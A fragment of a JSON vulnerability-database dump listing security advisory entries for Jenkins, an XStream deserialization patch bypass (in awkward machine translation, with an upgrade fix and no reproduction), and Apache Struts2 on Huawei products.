"bulletinFamily": "unix", "cvelist": ["CVE-2013-5573", "CVE-2013-7285"], "description": "\nJenkins Security Advisory reports:\n\nThis advisory announces multiple security vulnerabilities that\n\t were found in Jenkins core.\nPlease reference CVE/URL list for details\n\n", "edition": 7, "modified": "2014-02-14T00:00:00", "published": "2014-02-14T00:00:00", "id": "3E0507C6-9614-11E3-B3A5-00E0814CAB4E", "href": "https://vuxml.freebsd.org/freebsd/3e0507c6-9614-11e3-b3a5-00e0814cab4e.html", "title": "jenkins -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "myhack58": [{"lastseen": "2019-07-25T19:46:39", "bulletinFamily": "info", "cvelist": ["CVE-2013-7285", "CVE-2019-10173"], "description": "## One, the Foreword\n\n**XStream is a commonly used Java class libraries used to serialize an object into XML, JSON or deserialize the object.**\n\n## Second, the vulnerability profile\n\nXstream 
1.4.10 version exists deserialization vulnerability CVE-2013-7285 patch bypass.\n\n## Third, the vulnerability to hazards\n\nThe bucket like a security emergency response team analysis, when using Xstream 1.4.10 version and not on the security framework initialized, the attacker can carefully construct the request packet in use Xstream on the server to remote code execution.\n\n## Fourth, the scope of the impact\n\nProduct\n\nXstream\n\nVersion\n\nXstream1. 4. 10 version\n\nAssembly\n\nXstream\n\nFifth, the vulnerability reproduction\n\nNo\n\n## Six, solution\n\nUpgrade Xstream to 1. 4. 11 version\n\n## Seven, reference\n\n> http://x-stream.github.io/changes.html#1.4.11\n> \n> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10173\n\nThe above is the high-risk vulnerability and early warning related information, if you have any questions or need more support, you can contact us.\n\nContact phone: 400-156-9866\n\nEmail: help@tophant.com\n\nBucket like the Security Emergency Response Team\n\n2019 7 December 25\n", "edition": 1, "modified": "2019-07-25T00:00:00", "published": "2019-07-25T00:00:00", "id": "MYHACK58:62201995222", "href": "http://www.myhack58.com/Article/html/3/62/2019/95222.htm", "title": "Xstream remote code execution vulnerability-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "huawei": [{"lastseen": "2019-02-01T18:02:28", "bulletinFamily": "software", "cvelist": ["CVE-2014-0116", "CVE-2014-0050", "CVE-2014-0094"], "description": "",
"edition": 1, "modified": "2014-07-08T00:00:00", "published": "2014-07-07T00:00:00", "id": "HUAWEI-SA-20140707-01-STRUTS2", "href": "https://www.huawei.com/en/psirt/security-advisories/2014/hw-350733", "title": "Security Advisory-Apache Struts2 vulnerability on Huawei multiple products", "type": "huawei", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}